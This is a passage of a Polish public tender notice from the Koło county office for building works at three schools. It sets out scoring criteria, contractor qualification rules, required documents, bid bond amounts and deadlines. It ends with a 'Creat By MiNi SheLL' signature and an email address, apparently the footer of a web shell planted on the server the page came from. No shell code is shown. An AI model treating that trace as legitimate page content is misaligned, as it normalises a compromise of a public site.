Gwarancja - 10 pkt<br/>3)	Termin wykonania -	30 pkt<br/><br/>Punkty przyznawane za kryterium „cena zamówienia” będą liczone wg następującego wzoru:<br/><br/>C = (Cn : Cb) x waga<br/><br/>gdzie:<br/>C - ilość punktów przyznana danej ofercie,<br/>Cn – najniższa cena spośród wszystkich ofert,<br/>Cb - cena oferty badanej,<br/>waga – 60<br/><br/>Punkty przyznawane za kryterium „okres gwarancji na materiały i wykonane roboty budowlane” będą liczone następująco:<br/><br/>24 m-ce	- 0 pkt<br/>36 m-cy	- 3 pkt<br/>48 m-cy	- 6 pkt<br/>60 m-cy	- 10 pkt<br/>Waga – 10 pkt<br/><br/>Punkty przyznawane za kryterium „termin wykonania zamówienia” będą liczone następująco:<br/><br/>Od 10 do 16 czerwca 2025	- 0 pkt<br/>Od 3 do 9 czerwca 2025	- 15 pkt<br/>Do 2 czerwca 2025 - 30 pkt<br/>Waga – 30 pkt<br/><br/>Sumując punkty uzyskane w kryterium cena, kryterium termin wykonania zamówienia, i gwarancja na materiały i roboty budowlane, otrzymujemy punkty uzyskane przez daną ofertą (S) = C + T + G<br/>Oferta, która otrzyma największą ilość punktów zostanie uznana za najkorzystniejszą <br/>Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną.<br/>Zamawiający odrzuci oferty, wykluczy z postępowania Wykonawców lub unieważni postępowanie na zasadach przewidzianych dla tych czynności w ustawie Prawo zamówień publicznych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy: <br/>a) nie podlegają wykluczeniu <br/>Zamawiający stwierdzi brak podstaw wykluczenia z postępowania na podstawie oświadczenia z art. 125 ust. 1 Pzp, z zakresu art. 108 ust. 1 ustawy oraz art. 109 ust. 1 <br/> pkt 1.<br/>•	Oświadczenie z art. 125 ust 1 Wykonawca składa wraz z ofertą <br/>•	Na potwierdzenia spełnienia braku wykluczenia z art. 109 ust 1 pkt 1, Zamawiający wezwie wykonawcę, którego ofertę oceni jako najkorzystniejszą iż nie zalega z opłacaniem podatków i opłat – dokument wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem (w przypadku zalegania z opłacaniem podatków i opłat wraz z zaświadczeniem należy złożyć dokument potwierdzający, że odpowiednio przed upływem terminu składania ofert dokonał płatności należnych podatków i opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności)<br/><br/>b) spełniają warunki udziału w postępowaniu w zakresie:<br/>- Sytuacji ekonomicznej lub finansowej:<br/> W ramach części nr 1 i 2 (tj. szkoły ZSRCKU Kościelec oraz ZSOiT w Kłodawie):<br/> * Zamawiający uzna warunek za spełniony gdy Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 200.000,00 zł (słownie: dwieście tysięcy złotych)<br/> * Zamawiający uzna warunek za spełniony gdy Wykonawca przedstawi zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat,<br/>- Zdolności technicznej lub zawodowej:<br/>w ramach części nr 1 i 2 (tj. szkoły ZSRCKU Kościelec oraz ZSOiT w Kłodawie):<br/> * Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże iż w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres ten jest krótszy to za ten okres, co najmniej 1 roboty budowlanej, o wartości minimum 200.000,00 zł brutto każda, odpowiadającej robotom budowlanym stanowiącym przedmiot niniejszego postępowania, z podaniem rodzaju tej roboty i wartości, daty i miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, dowodami takimi mogą być referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego roboty te były wykonane lub inne dokumenty potwierdzające należyte wykonanie robót budowlanych. <br/>* Wykonawca zobowiązany jest również załączyć wykaz osób, które będą uczestniczyć w wykonaniu zamówienia publicznego zgodnie z załącznikiem Nr 3 wraz z oświadczeniem Wykonawcy, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeśli ustawy <br/> nakładają obowiązek posiadania takich uprawnień. Zamawiający wymaga:<br/>a)	jednego kierownika branży budowlanej<br/>b)	jednego kierownika branży elektrycznej.<br/><br/>w ramach części nr 3 (tj. szkoła ZSE-A Koło):<br/>* Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże iż w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres ten jest krótszy to za ten okres, co najmniej 1 roboty budowlanej, o wartości minimum 80.000,00 zł brutto każda, odpowiadającej robotom budowlanym stanowiącym przedmiot niniejszego postępowania, z podaniem rodzaju tej roboty i wartości, daty i miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, dowodami takimi mogą być referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego roboty te były wykonane lub inne dokumenty potwierdzające należyte wykonanie robót budowlanych, zgodnie z załącznikiem nr 5. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">dokument o nie zaleganiu z opłacaniem podatków i opłat – dokument wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem (w przypadku zalegania z opłacaniem podatków i opłat wraz z zaświadczeniem należy złożyć dokument potwierdzający, że odpowiednio przed upływem terminu składania ofert dokonał płatności należnych podatków i opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W ramach części nr 1 i 2 (tj. szkoły ZSRCKU Kościelec oraz ZSOiT w Kłodawie):<br/> a) Zamawiający uzna warunek za spełniony gdy Wykonawca wykaże, że jest ubezpieczony od <br/> odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż <br/> 200.000,00 zł (słownie: dwieście tysięcy złotych)<br/> b) Zamawiający uzna warunek za spełniony gdy Wykonawca przedstawi zaświadczenie <br/> właściwego Naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z <br/> opłacaniem podatków i opłat,<br/><br/>2. w ramach części nr 1 i 2 (tj. szkoły ZSRCKU Kościelec oraz ZSOiT w Kłodawie):<br/> a) Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże iż w okresie ostatnich 5 lat <br/> przed upływem składania ofert, a jeżeli okres ten jest krótszy to za ten okres, co najmniej 1 roboty <br/> budowlanej, o wartości minimum 200.000,00 zł brutto każda, odpowiadającej robotom <br/> budowlanym stanowiącym przedmiot niniejszego postępowania, z podaniem rodzaju tej roboty i <br/> wartości, daty i miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane, z <br/> załączeniem dowodów określających czy te roboty zostały wykonane zgodnie z przepisami prawa <br/> budowlanego i prawidłowo ukończone, dowodami takimi mogą być referencje bądź inne <br/> dokumenty wystawione przez podmiot na rzecz którego roboty te były wykonane lub inne <br/> dokumenty potwierdzające należyte wykonanie robót budowlanych, zgodnie z załącznikiem nr 5. <br/>b) Wykonawca zobowiązany jest również załączyć wykaz osób, które będą uczestniczyć w wykonaniu <br/> zamówienia publicznego zgodnie z załącznikiem Nr 3 wraz z oświadczeniem Wykonawcy, że osoby <br/> które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeśli <br/> ustawy nakładają obowiązek posiadania takich uprawnień. Zamawiający wymaga:<br/> - jednego kierownika branży budowlanej<br/> - jednego kierownika branży elektrycznej.<br/><br/>3. w ramach części nr 3 (tj. szkoła ZSE-A Koło):<br/> a) Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże iż w okresie ostatnich 5 lat <br/> przed upływem składania ofert, a jeżeli okres ten jest krótszy to za ten okres, co najmniej 1 roboty <br/> budowlanej, o wartości minimum 80.000,00 zł brutto każda, odpowiadającej robotom <br/> budowlanym stanowiącym przedmiot niniejszego postępowania, z podaniem rodzaju tej roboty i <br/> wartości, daty i miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane, z <br/> załączeniem dowodów określających czy te roboty zostały wykonane zgodnie z przepisami prawa <br/> budowlanego i prawidłowo ukończone, dowodami takimi mogą być referencje bądź inne <br/> dokumenty wystawione przez podmiot na rzecz którego roboty te były wykonane lub inne <br/> dokumenty potwierdzające należyte wykonanie robót budowlanych, zgodnie z załącznikiem nr 5a.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)	Pełnomocnictwo upoważniające do złożenia oferty, w przypadku pełnomocnika,<br/>2)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składnych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>3)	Zobowiązanie podmiotu trzeciego, wraz z podmiotowymi środkami dowodowymi potwierdzającymi że nie zachodzą wobec nich podstawy wykluczenia z postępowania. (załącznik nr 2)<br/>4)	podwykonawstwo zgodnie z załącznikiem nr 6. Jeśli dotyczy,<br/>5)	Oświadczenie z art. 117 składane przez Konsorcja (jeśli dotyczy),<br/>6)	wykaz osób, które będą uczestniczyć w wykonaniu zamówienia publicznego zgodnie z załącznikiem Nr 3 wraz z oświadczeniem Wykonawcy, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeśli ustawy nakładają obowiązek posiadania takich uprawnień,<br/>7)	dodatkowe doświadczenie zgodnie z załącznikiem nr 4,<br/>8)	Dowód wniesienia wadium,<br/>9)	Kosztorys ofertowy jako element pomocniczy – nie załączenie go do oferty nie spowoduje jej odrzucenia <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	Pełnomocnictwo upoważniające do złożenia oferty, w przypadku pełnomocnika,<br/>2)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składnych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>3)	Zobowiązanie podmiotu trzeciego, wraz z podmiotowymi środkami dowodowymi potwierdzającymi że nie zachodzą wobec nich podstawy wykluczenia z postępowania. (załącznik nr 2)<br/>4)	podwykonawstwo zgodnie z załącznikiem nr 6. Jeśli dotyczy,<br/>5)	Oświadczenie z art. 117 składane przez Konsorcja (jeśli dotyczy) <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> druk oferta <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wadium w wysokości:<br/>W ramach zadania nr 1: 3.000,00 zł (słownie: trzy tysiące złotych 00/100)<br/>W ramach zadania nr 2: 6.000,00 zł (słownie: sześć tysięcy złotych 00/100)<br/>W ramach zadania nr 3: 1.200,00 zł (słownie: jeden tysiąc dwieście złotych 00/100) <br/>- wadium dla każdej z części musi zostać wniesione przed upływem terminu składania ofert, oddzielnie dla każdej z części.<br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>a)	w pieniądzu<br/>b)	gwarancjach bankowych,<br/>c)	gwarancjach ubezpieczeniowych<br/>d)	poręczeniach udzielanych przed podmioty, o których mowa w art.6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2023 r. poz. 462)<br/>3.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto Starostwa Powiatowego w Kole w Santander Bank Polska O/Koło nr 95 1090 1203 0000 0001 0967 1680 z adnotacją: wadium w ramach postępowania Nr ZP.272.3.2025 dla części nr …”.<br/>4. Szczegółowe informacje zawiera swz. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegółowe informacje zawiera swz. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> rodzaj i zakres zmian reguluje projekt umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-05 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma zakupowa https://starostwokolskie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-05 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> termin wykonania jest jednym z kryteriów oceny ofert

Creat By MiNi SheLL
Email: jattceo@gmail.com